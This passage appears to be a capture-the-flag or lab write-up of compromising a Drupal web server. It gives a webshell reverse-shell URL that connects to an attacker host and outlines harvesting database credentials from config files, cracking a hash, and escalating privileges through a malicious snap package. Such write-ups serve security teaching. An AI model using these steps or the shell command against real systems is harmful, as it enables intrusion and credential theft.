We can use this to easily put a webshell on the page. The exploit would put a shell.php file on the webserver that takes a c parameter for the RCE.
By going to http://10.10.10.223/shell.php?c=bash+-i+>&+/dev/tcp/10.10.14.9/4444+0>&1, we would get a shell.
Privilege Escalation
SQL Creds
Within the Drupal configuration files at /sites/default/settings, we can find a password for the SQL database.
With this, we can login to the SQL server and enumerate the database. By dumping the users table from the drupal database, we can find a username and hash.
Hash is easily cracked with john.
Then we can SSH in as the brucetherealadmin user using this credential.
Dirty Sock
When checking sudo privilges of this machine, we see that we can run snap.
By checking the snap version, we can see that this is not vulnerable to the dirty sock exploit because it is updated.
However, because we run snap as root, this means that we can create a malicious snap package to be downloaded, and the imported package would run the dirty_sock exploit.
